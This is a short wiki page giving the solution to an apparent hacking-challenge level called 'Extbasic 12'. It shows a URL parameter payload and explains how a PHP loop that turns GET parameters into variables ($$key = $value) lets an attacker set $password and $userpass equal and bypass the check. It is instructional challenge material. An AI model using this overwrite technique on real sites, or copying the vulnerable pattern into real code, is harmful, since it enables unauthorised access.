Extbasic 12

From Kyle's Wiki
Jump to: navigation, search

Solution 

moo.com/index.php?password=x&userpass=x

Explanation

The hack is done in the following code : 

foreach ($_GET as $key => $value)
        { 
          $$key = $value; 
        }

$_GET is an array and basically this code means : 

${$key} = $value for each value you put in $_GET

So if you put in 

$_GET password=x and userpass=x

you'll have: 

$_GET[password]=x and $_GET[userpass]=x

and the foreach will do 

$password=x;
$userpass=x;

and we will have 

$userpass == $password
Retrieved from "http://wiki.xkyle.com/index.php?title=Extbasic_12&oldid=3140"
Personal tools
Namespaces

Variants
Actions
Efforts
Toolbox
Meta